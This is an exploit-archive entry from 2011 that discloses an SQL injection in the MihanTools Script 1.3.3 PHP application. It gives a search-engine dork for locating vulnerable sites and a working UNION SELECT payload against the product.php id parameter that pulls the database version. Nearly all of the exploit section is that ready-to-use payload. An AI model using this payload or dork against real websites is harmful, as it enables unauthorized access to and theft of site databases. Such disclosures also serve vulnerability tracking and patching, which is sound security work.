[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MihanTools Script 1.3.3 SQL Injection Vulnerability
# Published : 2011-02-09
# Author : WHITE_DEVIL
# Previous Title : Rae Media Real Estate Multi Agent SQL Injection Vulnerability
# Next Title : Dew-NewPHPLinks v.2.1b (index.php) SQL Injection Vulnerability
# Exploit Title: MihanTools Script SQL Injection Vunerability
# Platform: php
# Date: 09.02.2011
# Author: WHITE_DEVIL
# Software Link: http://www.mihantools.ir/
# Version: all version
# Tested on: Windows Sp2
# Mail: Mr.web70@yahoo.com
# Dork: inurl:product.php?id= *Powered by MihanTools*
# Exploit:
http://localhost/product.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14--
# Greetings:
IRAQ_JAGUAR, Joker_Sql, Karar_Alshami, Karar_Aljbory